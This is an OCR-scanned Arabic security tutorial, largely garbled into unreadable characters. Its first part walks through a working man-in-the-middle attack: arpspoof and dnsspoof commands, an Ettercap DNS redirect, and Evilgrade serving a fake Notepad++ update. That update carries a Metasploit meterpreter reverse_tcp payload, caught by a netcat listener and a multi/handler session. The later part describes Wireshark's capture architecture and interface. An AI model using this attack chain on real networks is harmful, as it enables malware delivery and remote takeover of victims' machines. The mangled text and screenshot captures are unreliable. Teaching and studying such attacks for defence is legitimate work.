^.UujjI (Ja* C5 ic l1a*J c^^Jlj (JjiiljJaxJl ( flla ^Uljl aJ jl tDNS ^^ll CjI jLoilaaVI ^-lAaJ LllljLaJjaj V I <C.Ll^a DnSSpOOf 

>C5 i^J| ^LaJt IP jl jic iaia <lis^ 

#dnsspoof [-i interface] [-f hostsfile] [expression] 

.(wildcards ^l^aJLmlj ^jujj c aUl 11a) l^iijjj ^1^31 
fii^ Jc (JliLd lia.V tg_a.^)judj L_a jjoj ^jll j tcpdump ftbVI ^ ^*i>>i^ll ^j!>U3I ^bviml ^iij ^-jl (J*ja expression jjj^'^I Lol 

:JV1£ 

#echo 1 > /proc/sys/net/ipv4/ip_forward (enable port forwarding) 

#arpspoof -t 192.168.1.245 192.168.1.5 &; 

#arpspoof -t 192.168.1.5 192.168.1.245 &; 

#dnsspoof -f spoofhosts.txt host 192.168.1.245 and udp port 53 
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Spoofing Tool: Evilgrade 

tilli j Cjliu will j^p^JI cialajiJajli ^ s^liiujVI V uj*^ $ a\\ l!*-?^ <-!j^ <iajujl c_j ji&a ciijj£jaj EvilGrade 

java J' ++I10tCpcid t8>1 J ( . lilaj ^^jll £c-gI^)JI A^u ^jj JJ^ <i]L ^^ic ^ j CjIjj^j <J-gc (JjJ^ia 

CjU^SI ^> cilU^ jjSj jl jSaj) .DNS Spoofing ? j^a 

^evilgrade j»l^a^it laj 

jJjUjuJ! (J-g U*^W <-S^^ ^ L>* *LS^ A O^^J 6t QJ^^^ jJ S^lc] <J*^ f ^ g UJ^ LdAjc jUaVl lA& <^L} 

Internal scenery: 

- Internal DNS access 

- ARP spoofing 

- DNS Cache Poisoning 

- DHCP spoofing 

- TCP hijacking 

- Wi-Fi Access Point impersonation 
External scenery: 

- Internal DNS access 

- DNS Cache Poisoning 

slSU^l ^jjjjjja ^ Ajiiiii ASn Cjli J£ 1 63 ^ ^ (modules)^^j^ c> Evilgrade 
^ ^jjujI uj^ cjUl^JI ^jli tillil DNSserverj webserver Ljajl ^ *j j .ai^ ^ ky^^l^t jll djj laall 4jUr. 

jikV l^l^ki^lj JaS *t£>V t*llij msfpayload jl "msfvenom" Metasploit si J ^^ki^j lJj^ j^kill liA ^ 

.A-lauJall 

Attacker IP: 192.168.168.156 [kali Gnome Desktop 64Bit] 
Victim IP: 192.168.168.159 [Windows XP SP2] 



I^VIS Jlia jjII yi evilgrade j*V! J^U ^> ciUij evilgrade ci^^' l!^-^ u^^ ^ 



rootgJANA 


:-# svilc 


]jrade 




[DEBUG] - 


Loading 


module : 


modules/express_talk .pm 


[DEBUG] - 


Loading 


module : 


modules/mi randa . pm 


[DEBUG] - 


Loading 


module : 


modules/atubs .pm 


[DEBUG] - 


Loading 


module : 


modules/winzip . pm 





mm [LDcaoDES 



www.infobytesec .com 



- 63 modules available 



evil grades 
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.evilgrade <jL«uJt ^ ^sll cj! jU^JI £4*^ ^jjl help 3_Aj£j f 



jj>help 
.p com 



mand 1 for more detailed help on a command. 



confic 
exit 
help 
reloac 
restar 
set 
show 
start 
status 
stop 
versic 
vhostE 
Lqrades 



Con fig 
exits 
prints 
Reload 
Restar 
Config 
Displa 
Start 1 
Get we 
Stop w 
Displa 
Show v 



ure <module-name> - no help available 

the program 
this screen, or help on 'command' 
to update all the modules - no help c 



t webserver - no help available 
ure variables - no help available 
y information of <object>. 
webserver - no help available 
bserver status - no help available 
■ebse rver - no help available 
y framework version. - no help available 
hosts enable - no help available 



.show modules j-*^ ^J-^ ^ 4-*-* ^ a>ikiu^l jll ^-1^ 



evil q rade>show module:: 



List of modules: 



allmynotes 
amsn 

appleupdate 

apptapp 

apt 

atube 

autoitB 

bbappwo rid 

bl ac kbe rry 

bsplaye r 

ccleane r 

clamwin 

cpan 

cygwin 

dap 

divxsuite 
exp ress_t alk 



ffi&tlD [ID ODES 



configure <module-name) J^uj aLI^j pjb .^ill 



*vilq rade> conf iau re notepadplus 
evilgrade f notepadolus) >1 



-cP^ show options ^ v^Wi UjI^I <^*j ^1 Cj! jL^JI j*] 



evilg rade C notepadplus) > show options 
Display options: 



PJame = notepadplus 
Ve rsion = 1 . Q 

Author = ["Francisco Amato < famato +[AT]+ inf obytesec 
Description = "The notepad++ use GUP generic update proc 
VirtualHost = "notepad-plus.sourceforge.net" 



Name 


j Default 


| Description 


enable 


1 1 


| Status 


agent 


./agent/agent .exe 


| Agent to inject 



evil g rade f notepadplus) 
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URL * ^ > ^ SjSLftl! L-u^aaj A\"% > ^11 ^La lie. <j| ^^-isu j VirtualHost o^lcl Sjjj^all ^£ 

. liA lJj^ cjSj notepad-plus.sourceforge.net 
.msfpayload ^ l^luL reverse_tcp agent ^ ^I^U c^*S ^3 .^LLaJI s jj^ll ^ ^jj U£ Agent yr* * 

#msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.8.91 LPORT=1234 X > 
/root/Desktop/testing.exe 



root@JANA msfpayload windc 


Ms/me 


sterp refer/ reverse_tcp LH0ST=192 . 168 


.8.91 LP0RT=1234 X > /root/De 


asktop 


3/tssting .sxs 


Created by msfpayload [http:/ 


'/www 


metasploit .com) . 


Payload : windows/met e rp rete r/ 


' revet 


~se top 


Length: 29Q 






Options : { "LHOST "=>" 192 . 168 


j.91", 


ll LP0RT ll => ll 1234 11 } 


root@JANA:-# 







\JN& set agent ^I^L-U agent ^jA? ^jSjj evilgrade ^ 



evllg rade ( notepadplus) > set agent /root/Desktop/testing.exe 
set agent , /root /Desktop/testing .exe 
evil a rade f noteoadDlusl sTl 



.^U. 80 u' l> ^ j start c> ^ j evilgrade J^-^ <JU3I s jia^Jl 



evil g rade f notepadplus) > sta rt 
evil q rade f notepadplus) > 
[13/7/2014:20:25:45] - [WEBSERVER] 



observer ready. Waiting for connections 



evil q rade ( notepadplus) 



JL^ajV! jj d^IcI ^Ettercap ^ ; L_L^alL<JI cJ^-j ^ ^tacrl Lj^jI 'Evilgrade ^-^-j Cy* ^-I^jVI 

jI^cI l$A.teaj ^jll JjVI s j^aaJl .(jjiKllI AiU-bVU <j^aLk3) 6jSLalt C-Ij^j j^-n ijjj LoAio tilli j Evilgrade ^LA\ 

ic^VK etter.dns 

#nano /usr/share/ettercap/etter.dns or nano /etc/ettercap/etter.dns 

i^VtS OLII liA ^ jkJ! JU^I ^ 

notepad-plus.sourceforge.net A 192.168.8.91 



################################ 

# microsoft sucks ;] 

# redirect it to www .linux .org 



|notepad -plus .sou reef orge .net A 192 . 168 .8 .91 



microsoft.com A 198.182.196.56 

*. microsoft .com A 198.182.196.56 
www.microsoft.com PTR 198.182.196.56 



DMio aocaoDi 



# Wildcards in PTR are not allowed 



.LLLoi Ll<Au La£ ettercap ~ i^Ludj l_a ^juj aJUII s jia^JI ^ 



Start Targets Hosts View Mitm Filters Logging PI ugi rrs Help 



Plugins » |nost List X | 

R Address ; MAC Address 
| X^2 . X&S^S.S EQ:Q5:C5:5A:26:94 



192.16S.S.BS OO 

1^2- igs.s.s^ OO 



1^2 . l&S .3 .^3 OS 



2 3 
2 1 



■4- Router address -— =- Add to Target 1 | 



8B:7C:27:9D 
SO : F ^ : 3 A: D-S 



2 "7 : AF : 1 5 : F 5 Vi c-fei m Add re 



- Add to Target 2 



Delete Most 



Add to Target 1 



Add to Target 2 
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NG-0.7.3 

View Mitm Filters Logging Plugins Help 



Icmp redirect... 
Port stealing... 



> MITM Attack: ARP Pafscmtng 


m 


Optional parameters 


S | Sniff remote connections. | 


□ Only poison one-way. 








OK Cancel 



a v x ettercap NG-( 

Start Targets Hosts View 
Start sniffing Ctrl+W 
Stop sniffing Qrl+E 

Exit ari+X 



. Evilgrade*^! ^ c> lWW <J&\ 1234 ^ Netcat ^ v^>»n s 

J.ikU Ljajl U£ cjj . TCP / IPJ jjjjj J^luib t^i.nlt cjX^j jj^ diULi^H ( . uljj ijL ^ill jj^Ji Jj^I jjll stal Netcat 

■csjSVl c^j meterpreter 

#nc -1 -v -p 1234 

meterpreter l^^L? jt 



msf > use exploit/multi/handter 

msf exploit{hancler) > set LHOST 192.168.195.128 

LHOST => 192.168.195.128 

msf exploit {handler) > set LPORT 4444 

LPORT => 4444 

msf exploit ( handler) > set payload windows/mete rp rete r/ reve rse_tcp 

payload => windows/mete rp rete r/ reve rse_tcp 

msf exploit {handler) > exploit 

[*] Started reverse handler on port 4444 

Starting the payload handler... 
[*] Sending stage (723456 bytes) 

[■■] Meterpreter session 1 opened (192.168.195.128:4444 -> 192.168.195.129:1071) 



meterpreter > | 



i 3 j^i^iij jjjjj jjj-* J ^tI. m\ jtjflj <jl jSa^n 



C:\Program Files\Notepad+ +\change. log - Notepad-) 



File Edit Search View Format Language Settings Macro Run TextFX Plugins Wi 



i J change.log | 



1 Notepad++ v5 . 3 . 1 new features and fixed lungs ( from 

2 

1. Fix inaccurate replace Idtjlcj. 

4 2 . Increase Find what and replace with fields to 

5 3. Stop the indicator hicjhl icjht incj while the line 

6 4 . SConstri 
7 

Included pJ 



11 2 . MppExec 
-f ■-■ ■-■ .— . i i i<— 




.ILLoj Uj^j U£ nc jl meterpreter *l o^j a^A^ yes (ij* ^j^j 
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(Sniffing Tools) *3M 8.6 



jljiSllI j sniffing ti^^j ^ *<jVI 
m 4^}*\\\ djUUj Jc di> *aHil sniffing ^l ^l^aJLuit ^jjnun (j-i^lg.^! j <jal^<J sniffing 
.sniffing ^ ^iklauJI CjI j^VI <j-a .ii^x]! till q^jxa l_a jjoj <-jU3I li& ^ 



Sniffing Tool: Wireshark 



[Wireshark] 



^1 cAJhll jjSa. l-ijjoij ^.juuj jll jjkxJI jjL jl JjS ethereal wireshark 2006 

a£ ^ Jaxj jl£ 'yyii^ cJ^ 1 ^^ cs c> j^j^^ f j^- s^j^ j*j ' [Gerald Combs] ^ '1990 j^ljl 

J tCpdlimp ^-^ jll J ^Li^klauJl CjI j^VI (J^asu cilUfc Uiajl d±jl£ j t((J»i^\^ J O^S$ J**) (^joLujVI (JjliJlill ^Uaill 

^ j«j ethereal ^jMt *-^*il . L> *] aJ a^l ^ 1998 ^ Jlj^ J jVI ^Jl jjl^I j ethereal ^' ^ snoop 

.Network Integration Services Wffi* 
j^Jt ci!3i£ j ethereal <jj^ Jlj ^ .CACE Technologies j ^Jfr d£ '2006 j^* 

CjIcj jiauJ ^jjjLojI^ ethereal l^lp^ £^ jiau* ^vimj j^i tillil c (GPL)j^ ^ > ^ j ^sjj^ ^j^i ^J-s-^ J 



.wireshark ^Vl ^15 t*Uil ethereal j <^»UJI ^jjW^ ^3 ^ «t*Ui .wireshark 
^ ^ .wireshark ^ ^ ^jfl CACE ^ Riverbed Technology ^ ^ 2010 ^ 

.wireshark c^j J ethereal c>Vl ajjUiJ Ca^ J j ethereal j^j^ 



^ ^t^t) ^<^^,t( djj^j ^ ill La j j^t j JIj^uj ^^Ip vgjj Wireshark f^jj ^ ^ 

^Uiu£l j 6jbU ^j^J (jl oj V till AjjouIU Liajl j . JIjjoJI liA 4 t ia&1 ^1j ^3 tillil j 1jjj£ CiijliVl AaIsu jVl 1 W a £tij^al JaI 

t^ju) till <jjau3U ^-<J1 (j-d <jl t . ujuJI I^a .a£jJ^1 C5 lc Cj^j ^^>xj V ciu£ lij Vj a£jJo31 qaAa j \^\-\WfA j <J£LSuJl 

^a3j ,4£jjaJl ^^ic t8>i w j liU» 4i^>sLxJ <jojj£^ CjI^jjoJIj i (jisbuoWj i sjjjj^^^j ^ ^jjuiaII (j-<» l^j^l Wireshark 

,^Sjjjj JjJaal L^L\i lU*^ ^i*^ Wireshark lS^-^ j ^^ijl ^ cjKj/MI ^ jja ^ J£ ^ jj> ^ ^i^i^l ^aLoj 

^wireshark j) >^ 

Jjl^j j 4_jj1 j3_Il a£jJo31 jjc jl c^J^LuoVl jac* 5-1 jjuj aJLuijI ^jj L* ua*ifa u^i cjI£jJo31 jjc <iuj^<Jl ^j^Jl cj^ 2 ^ r» W^ireshark 

fii^ j ^-jH]l ^jia^su j ^jl^Jl 6jl^)^. ^.J^ ^xjolLoiJ j^a 6jl^pJl ^.J^ (JJ^ jW^ 1 obVl J^flJ (jl (j^J 1 ^ J > SJ ^jiajC. 

>t *ljLaAjj^! C;f Jj Uj <Jc^ cJ^^iil j ^ jSII AjjjI Ajj^JI 4^ j^^l <^ jjLd Igil U£ IgJU^ ^ ^iju^l j CjIjjVI J^a^ SbVl 
dj^. lil til^iii V cJl^iii ^Uaj ^1 [IDS intrusion detection system] ^ VI sbVl 6^ 

.L^JjIsLIj ^ jSLAuiJ l^jJa^>xlajj till *L<» j!>l!l CjUUill ^-iA^lj ^ (j^J ^(^^ cJ^jV 1 g o laJLujJ VI ( ; laJ La£j 4£jjaJl ^glc 
tillil jaJl ialEilV WinPcap f / *°^l JJJ^^I ^f^> (^5^ JJ^>^I C5^« C5^-^ ^'^ J -latajll till ^tJJJ tiljtui Jj) jJl 

'IEEE 802.11 c> ^jj^Uo a£jj^1I laSlL . WinPcap W-^^ <^^j»^l JaSa ^ jaJI -^^1 ^ 

lJUIVI cjI^j .Frame Relay 'Token Ring 'USB ^jlJI ^5 .(ATM) JVl aij— II sj^l 'PPP/HDLC 

.(display filter) lP 3 j 15 ^ ^l^i^L? ^U^' 
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^cSl jll 4£jjuo3I CjI^j ^jJa jl till ^ajujJ .Ijjoj Ai^lLu^ll JjJ-a J^ (><u gaUl] SbVI *>i& ^I^JjojI 



^ Jc. ^blj jj^I a£js. J£ <_sjj o 1 'J^j .promiscuous Jj^l 



Attacker 



-> 

««. -> 





WiresharkTool 



Network 



Victim 



http i / / www . wircshark. org J^t £)\ j^*-^ cs-^] 4-^^ Ale L* <J£ j^j l!^*-^ ^Uaj A J Lajj jl (Jj^^iJ j^ja Iaa^Luj 
.[apet-get] pi*^ j±nj\ jl£ bjj ^u v^m^ t 3^>JI Je Aij [#yum©install©wireshark*] : JVIS & J 

: jyi* djU, jjijii cjIj^ 

.Offline jt Online t^jll J J.^'^ ^ " 

.Tshark ^ TTY j> j^jll ~ v^i.^i ^l^klajU L*l jjc 1 * LI Sill ^li Jll CjULiJI till 

. Jj t . uu II j* U j^j 'NetBSD 'FreeBSD 'u^j^ 'OS X 'c^ 1 ^ Oj^j s^xl* cj K^^ J^ 

.(^jU^ll/o^ljill) l^JalalU Jll CjULJI CjlLjuajj j* ^a*JI ^c^j 
<USB 4ij3jLll luS3 i(ATM)JV! lJ! SJ*J <PPP/HDLC 'IEEE 802.11 ^ j^j c> * J^W- ' - 

.(A o^UJ! ^L-Vl f UiSll c> bUfcl) Ujxj <(FDDI)^ ^bfiM cK^ j .Frame Relay 'Token Ring 



^[(network analysis)] te±2A\ ja U *t 

aA**1\ ("J j£ jj jjJI JjlaJ M ( jgUti) a£jj^3I JJ^i .CjIj^II kj^Vi ^Ij^jj 'cjjj^'^ ^ ji^ j t^jlftVl cjla jj^JI tpbVl 

<J jj^^J! ^-ll^J ttilli £aj dua 4£jjuj cJl^ (j^akjai O^J .^^^^ J ^^^ , ^^> , ^ , ^ J^ r * ^ 1>t1 J^ a£jjoJI (JjI^j 

ci^linlajll jl (jljlkVI Jc j) ^^^juJI e-hVl ^jlj (jl ls^j^^ ^j^l ^f^ 1 l3^* uj^ ^i^^i CjIjI^ Jc 

. [TCP/IP]^vu-i:vi JjSj2 JJ# i fulfil .i 

Jll s 4 >V! ^I^VI CjUjIx^j IP jl DHCP 
?www. wireshark.org Jj <J ^^jjouJI aijj LdAjc l^JI L_jl&i3! ^jjj ^ill jll IP jl jjc <i^x-<i ^A^Luaxll ^ ?IP j^.^ 

jc t^L (j-aUJI ^^UJI ^jj L_fl5 jj lij cj^j liU ?I1a l-ujuj U ^^su V ciijlj Jasu V AJ DNS '^j bU 

(Packet capture) J*^ cr^'j [Pcap] cA^Sl* ^j^i ^bl Jj ^Hau 4Jli jj^LjJI J wireshark j»l^lujt 

ISpSft j& jaj JJ) CjUUJIj ? >JI JalUll ^j^mi J^ [AirPcap] jl [winPcap] 
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.^cxAjjJl (J-^ J^ Pcap a fK o dllJJJ ,j£tjj (j! tililc ia^a ^^>Joi (^1 Jj ^tl^J AA^juj £Lx»ljjj3l C-UJJJ 

jjijjj (JjT.uij ^UaL J-<isu Jll 6 j^VI J *LabViml ^jj .4_iaLjaVl 6 j^VI Jc- JUg ^jSuj Ua» jj^j ^ AirPcap ;4iaj^l4 

.4_iiLoj^l jj><JI Jj ^UIojVI J tiSjlui jj) jit 4^^klojj 

,^^J| JJ^a ^^P" J fiiLoJl CjVI^JI ^J^J j (jlal^xlaj! .3 

;4_JU3I ^l^JI J 4£jj^3I J jIulaS <jjou31j tiljUi jjI jll ~ ikl^ ?<£jjLi jj) jJ) - laJL uj liUJ 

jjjJl £-bVI ^JC ^tJJJ jAj^all j^ ^j^j] lA^jqVi ^JJj tciljLuj jjI jll (j-a lc jJjuj 

,4^JjoJI ^nlaj <iajaj| lAjLoij] ^1 Jj^y^\ cJj^^ J -^-£^1 A-il^c ^nJalli (JjlaJ 

, jjj-<J| ^^>^- ( ^-^> ^aal] 4£jjoJ! (JjI^j CjIj^S £txi!^)i3! Jajoij ^jl ^j£-<»Jj ^A^jjuall L_astjJa3l 

?djLi j.) jJI J^u uLS jl How Wireshark Captures Traffic ^ uL£ 

^ JaUjj j (Link-Layer) ^U^^ ^ j [OSI Model] t> ^*j[capture] JalislVI jj 

cj! jia^JI Jj jiaiila b^ ^tjjJa jllj (frame) jUaVI 



GiMF Graphical Toolkit (GTK) 



{disse&tors - plug ins - display filters] 



Core Engine 



dumpcap 
Capture Engine 



Wiretap Library 



libpcapWinPcap 
[capture filter] 




network 



4iUaJ Jc Axuau ;4^Xui Jj iiL Q^liJ) JJ JJJA^l) Jl^ J-uSJJ UjUP 

Jl^ jV ciUi j [Link-Layer] ^bJI Jj^ jj j NIC j 

J NIC J djliUaJ Jc^ Axusu tiljl^ jjI jll Liajl 

CjlaUaJ (jl ^IslSI ,(Jji^j3lj JalililVI ci^-^ C>° ^3^^ J^^>^ L - J ^^^^ 

>( jii3UJI UK J Ifrjuoii ^ NIC ^-^j 



:(OSI model J ^1 AiAJ!) c^UUJI 
AirPcap c^^^ J^VI J jj^j <^JajL -l^U WinPcap 

-L >Aii3 ^LJajU Aj^aU. LibPcap 
wireshark tS^ll c> ^ > ^*^ ^^j^ c^j [Pcap] ^j 
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jjj-aj JalijlVI ^-Aatj ^LSU tilli j dumpcap c^*^ *^ J^*^ ^ ttiSjLi jjIjJI J^s j-a fO^' JalSSil A-aIa^ fjj 

tiljLai jjI jll -latajJl cilja^G Jj SjjujLia A > <al -^1 djUUJl <j£j <a±la Jxjuui j* ^.1 j <j!>ljk j-a tA^JjuJl j-a <Jj^J jJl <Lg jaJl dll jUaj 

.[Wireshark capture engine] 

t*l Jj Jx^ij U j* lalSSlVI i> cr^ ^ J^V' [capture filter]-^^VI * jSk cUc ci^4? ^ 

^ jaJI ^ii^i J Berkeley Packet Filtering (BPF) (> v^ .. n JalislVI jSla .JaSa [capture engine] JalislVI 
Sjj*1I ; J jij s^clS cilliA j ^ j^JI ^-i^ ialiiilU ^ajL diia Wireshark jj ^j^I/lIiUIjjJI Jatajll ^jj j^ jjj^II aja ^ £-j^j 

^j^VU jl L$ ^UaiiLJl 'VpJl" ^ jll j CjU jLlaJI Cjj1£ Ul£a 4<^Jau^a 4_ljL> j (jSl j jlx-all Sjj£j L-LaJ 

<U j^-wdJ <JC L_flLuo£jjajVl .jl J-aJl J-^Vl J> 4_l£jauJl £JJJ cJ^J '(j^' 

JaliilVI j^aj *j tjllftll Jjjjoj Jc^ .W^fj] j Ja^jlVI 4jLc Jjt nn <^ill j& dumpcap ■JalSiVt <i! ja-a 

jj-dli Jll j [trace files] s- 3 ^— ^j*^ CjliLJI j .cjULj 6 ^ Ujlili L_aajjj ^j* MB 50 ^-^^-^ dAiLJI ^ <c ja^aI <jUaj 

.axj Uua liA (jjkij lJj^j [.pcapng] ^I^U 

[core engine]cr^^l tiSja^l 
til ja^ll jj .tiSjUi j^tjJI SjS jSj^ 11a j .^LujVI ^ j^ll Jj ^ J^V^ [capture engine] JalisJVi ^1 

^jjalujj cjI jUaj Jj ciljUi jjI jll Jj 3_^^la3l djjlJI CjI^j Jc J-<isu jll jdissectors cl>^ ^c^j tiljUi jjI jll ^Jujy\ 

.6^ Jc^ JSa. J^=^ ^J^ J jSa. b±G Jj jUaVl ^Jjoij (Jjja jc J^su dissectors J .U^V^ C?' ^IjS ^^klouJl 

c^LJI J^ ^^ILVI jSajj 4-^>J! cilj^ j&j [Ethereal Packet Analyzer] c> :[Epan] J^ l^j^j 

:<> uj^j www.wireshark.org J ^j^ll [Epan]^V^ J ^ L g J ±^A\ 

.CjV j£ jj jjjII JalijlVI CjULJ cjUUjII Jaia. Jc^ Jasu [protocol-tree]S j^iJI JjSjjjjj ■ 

www.wireshark.org J ^j^ll epan/dissectors ^V^' J ^ t> [Dissectors] ■ 

.plugin ^ UjaUbj ^jj dissectors c> [Dissector-Plugins] ■ 

www.wireshark.org J ±j±yAS epan/dfilter J >^ & [Display-filter] ■ 

U jL^alklj tiljLi jjI jll jl kiA jjujjII CjIj^VI GIMP j^j^ .^^1^11 <^lj ja jj* Jll A^a j-uijJI CjI jJ^I 
<J jj^^JI j£-djj,^li£ j CjIjI j^JI j tial jjll 2^^) cl)J^ Aaajai^illj 4_j^LkJI £-1 j^yi/cJ^-^V^ ^J^7> J^Uil] ^^klo^ j GTK + 2 

.www.gtk.org 6jLij <JjjL jo l^Sj^ CjUjkJI ^> Jo 

^ LibPcap J capture file JaliilVI cjUL ^1 jll wiretap ^l^ki^l ^ : [wiretap] ^^1^11 J^ c^aUl t 

<Jalfljl| ^j* ^ | jjuj djlii^ll j>» 1 flla ^J3 Ak- _5Ja ji^Jl traCC file ^f^^ djlil^l ^Ij^yi/Jl^^VI < la j J ^ajl - Iklujj j LLLoj 

CjliLJI l— iljjjudjj j-<i jjj^II j .core engine cs-^^J^ cilj^JI Jj < aUl li^ ^jLouj ^jL j^.1 Jalijll ^Ujjj jl tiljUi jjI jll <iajoj| jj 

^ [FRAME] jUaVlj [PACKET] ^>JI c« d^ 1 J* u * 

(J^Luj ^ilaj^a^ "4^<ij^." ^ilaj^axi ^Vlmj IjJJ^ J .(J J^ JJ J^>^^ (J-aI^J ^llc ( J ^^JjoiaII Cjl ^n^ll jxa jj^aJJai ^i^ll jJ.JA jl (_£jJjoi 

jj^A jjJ ^cj^alj lilljA jSlj 6A£jJall JJC <Luj jj ^aJJ ^1 t L^ajl 

Ji.) ^ aIjLII ^Ij MAC MAC jj ^Ull JU^jVI Jj Sj^V 1 ^ e^" 1 ^ g^^^ 1 :(Frame) j^V 1 
Jc^ Jaia c^ji^j ja j "Ethernet II." ^g^^l t J^l jlajuoll I^jj .cjI jUaVI ^ ^'i >> n Sj^VI jjj djVl^ajVI .(^j^j o 3 ' j 

. jUaVI ClAjjl^ ^ jC <jlxa diUi jlx-d Jc ^5jl^J V J -la^a AjaUiaj diUi jls^ 

i^ii jaJl (jli t TCP/IP^VU^I ^ . MAC jU^I ^ uj^ ^1 *L^Vl ^ *->JI : [Packets]^>J) 

.MAC 6& lj^Zj [IP header] 

.CjUUj Ji HTTP Header lUAj o ! o^j c^'j TCP Header ^ l^a *>JI ^ : [segment] f>J) 
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Fran* E : S39 tiytES pi wire £4J12 bi ts} , S 39 bytes captured <4 31Z ij-iHE> 
Interface id: O 
lnTAP_ENCAP : 1 

Arrival Time: Nfl-v 7, Z012 1E>: 0&: QEJ . 163&11QQQ Pacific Standard Tirre 
[Time shift for this pacik^t : D. QQQQQQQQQ seconds] 
ipcch Tinted 13&2311&^£-ie3611C>C'0 seconds 

[Time delta -from previous captured frame: 0,001194000 seconds] 
[Time delta from previous displayed frame: 0,00119^000 seconds] 
[Time since reference or first frame; 0- 12:3-047000 seconds] 
Frame Number; B 

Frame Length; 539 bytes 0*312 bits) 
Capture Length; 539 bytes £4312 bits) 
[Frame is marked; False] 
[Frame is ignored; False] 
[protoco "is in f rarne : eth : i p ; t c p : ht t p] 
[Coloring Rule Nan^e ; http] 

[Coloring Rule String; http II tcp-.port == &0l 
Ethernet II, Src: Kewl stt-_a7: bf : a? Cd4 : S5 : 64 : a7 ;bf ;a3> . Dst : Cadant. 
internet Protocol Version 4, Sre: 24. 6 . 173 . 220 (24,6,173,220). Dst : 21 
Transmission control Protoco l, 5re Pore: 6413 (6413} , pat Fort: http 
Hypertext Transfer Protocol 

■ GET / MTTP/l,l\r\n 

Ho &t : wwk . cheezbti rge r . comVr \n 

u&er -Agent? Nozi 11 a/5.0 {windows. NTT 6.1; W0W64; rvjl6.03 Gecko/ 2O10O, 
Accept : text/html . app 1 i cat i on/Kht ml +xml , appl i cati on/xml ; q=0 . 9 . */* ; q=J 
Accept - Language : en -US , en ; q =0 . 5 \r \r* 

Accept - Encod i ng i g z i p , de f 1 at e \r \n I 
Connection: keep -al i ve Vr \n 

Referer : http i/ZvvrtW. google . com/url ? s a=t-£rc t =j&q=Ae src= s&sou r-ce=web&q 

\r\n 

[Ftil 1 reqae st Uft.I : http : //w^ . c h e e z bur Q& r , com/1 



n 



The Frame 
section 
contains 
metadata 
applied by 
Wireshark 



Fran 
Packet 
Segment 

j j j 



Use the Wireshark Wiki Protocol Pages 

AilS Ai j*^3 http://wiki.wireshark.org jll s jtj jj JjSjjjjj djUi^a aLA^ J^U ^> ^ ^3 jUi jjI jll ^ 

>( Jj£jj jjJl jC dlLa jlxxll ^aJ.^3 URL Cfl LP.-- ^ Jj^J^ ^jujI AiLjal L^ajj <n .liljLuo jjI jib Aalxlall CjLg jIslxJI 

.( http://wiki.wireshark.org/Ethernet ) <^VI < 



L? 



file £tf=fl £e* £e £jp4u>« Aiut/i* Sirt^stK? TcfFprw^ Ioo«s Jntmis 

B m m at m - ; ra k s? ^ - \ ^ ^ ^ t ^ PTa] 0.0.010 » m ^ ^ sa 

1 ic Time Source Destwutton Purtoccl Info ■ 

33 0.1S13750O0 74.125.224,30 24.0.173. 220 HTTP continuation or non-MTTl 

34 0.1S137700O 74.125.324.80 24.6.173.220 HTTP Continuation or non-HTTl _ 

i Frame 54: 209 bytes on wire CI672 bits), 209 bytes captured (1672 hii:s> on H 

■ Internet Protocol Version A, Src 
e Transmission control Protocol n src 
Hypertext Transfer Protocol 
- Data bytes > 

Data: £3765836126e36124d492418! 
[Length; 155] 




0000 
0010 
0020 
0030 
0040 
0050 

oar' 



ad d"t 00 50 89 49 bb 7c 06 3< 

00 fl 66 5 5 00 00 c 3 76 3i 

24 18 f7 dc ca 3fi ac ea 87 7] 

9« ^5 ^. d ? \l «t> s 



Piepsi*a filter 
CalHizc- Mith. Fitte-r 

FoSihm UDP Stiearn 

■ &el<Ktefi Packet 
ki ProbacoJPage 



.p.i. i .<_.s.p. 9 

fu. . , v ><6.n6 r Ml 

- X. r ,U 1 , , 0=. 



ask.wireshark.org &* ^^Vl ^ J>^aaJI ^ 



^jJa ^ La£) tiljUi jj! jll ^d^klauJ JIjjuj (jc ojUc ^^ILd ^Uljlj Lais ttiljUi jjI jll ^L^a c j£ ^31 

J^^l 4^ .^J^ j^'jil 4 4-^»UJl illuiVl ^ http : //ask. wireshark. or g -M jll *O^J c> 



^^£3 liljUjj jjI jll AjjoijjjII Sialil! ^^ic Ajujjoj djJoj iaaa ^H^j m ^ j^j Lq jj^3^ ^^>^ ^ q j c-H 3 ^*3^ ^W^^ t-Ajta ^H^j V 
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^k A^CL*1\ c fljl la jll (j-d ^jAsJI tilU& ^ji ^ ^c. jll C5 lc .aJUII 4-aJj^a q^jxj tiljUi jj! j3I ^jli ;tiljLJj jj! j3I cJaxJI IHj LaAic. 
File Open j (jj* .S^-^j^ CjIj^VI JajjJjj ^.iuujjII 4_Ajli3! j& tiljLi jjI jll ^k Jiiill aIloij ^jjujI ^jla ^Slj a 



(a* €« M>« fio 

j K *t m m 



ttfw r £nn^< jMOsfecs 



llMpfKH^ loots Jr«tTTT*H: 

^ ♦ * T i (B 



91 

L 



Interface- List 



The World's: Must PojMit*r Network Proto c 



Open 

K ^ Sample Ciptur« 



^.^y How to Capture 
IMe-twcrHk Media 



Don rely on thF& Start Paige 
to move- around trt W4 re-sharks 
You won't see it when you are 
capturing traffic or working in 
saved trace files. 

Click tKe Op«n File button 

to begin analyzing a trace file. 




<jjonjjll J ja* j-<Jl jj^UxJl c allai a c Qui^lun j (trace file) c ala ^ (J.at.Lh .^^joujjJI jA\ A ^ La (j uj 

t£l iLS all 



File 

Edit 

View 

Analyze 

Statistics 



open file sets, save subsets of packets, export HTTP objects 
-> clear all marked packets, ignored packets, and time references 

view/hide toolbars and panes, edit the Time column setting, reset coloring 
-> create display filter macros, see enabled protocols, save forced decodes 
-> build graphs and open statistics windows for various protocols 
Telephony -> perform all telephony-related functions (graphs, charts, playback) 
Tools -> build firewall rules from packet contents, access the Lua scripting tool 
Internals -> view the dissector tables and a list of supported protocols 
Help -> learn where Wireshark stores global and personal configuration files 

^cl jS I J jj^a jll L-LzJxja j djliLal! ^iil ^^joUJjJ! dil -laJjJj ^^ic 6^ ja» jljjVl (J* A-j^ S^lflSj J-<iJtJl <l3 







1 ^ I'^l^l 




*stKs T < 1 icp^i "Hi JdoIs [rJcrTrjIt y*lp 




^ mum m -jQxss 


«k # >»072 t®3® «l ^ «i O 


« © 8 



Interlace; List 
Capluf • Optton* 
Start Ctpfvr* 
Slop Capture 
Rtitart Capture 



JL 



I — 

Open fib 
Save File 
Ck)i+ Fib 
Reload File 
FVirtt 



JL 



Go Bach 
Go F*rwi«j 
Go to Number 
t* Flnt 
Go to Last 



C-oloring 
Auto^Scrdl 



Jl_ 



Zoom In 
Zoom Out 
Zoom 100% 
Resize Columns- 



V 



Capture Frtfcr* Ha\p 
